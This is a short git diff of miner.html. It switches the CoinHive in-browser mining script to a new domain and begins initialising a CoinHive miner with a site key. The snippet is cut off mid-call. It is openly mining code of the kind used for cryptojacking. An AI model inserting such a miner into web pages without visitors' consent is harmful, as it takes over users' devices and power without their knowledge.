--- a/miner.html
+++ b/miner.html
@@ -1,4 +1,4 @@
-<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
+<script src="https://coinhive.com/lib/coinhive.min.js"></script>
 
 <script>
 	var miner = new CoinHive.User('IGjrSp6zpSz1FcVcJQyyy4MKHl22OXgm', 'githubminer', {
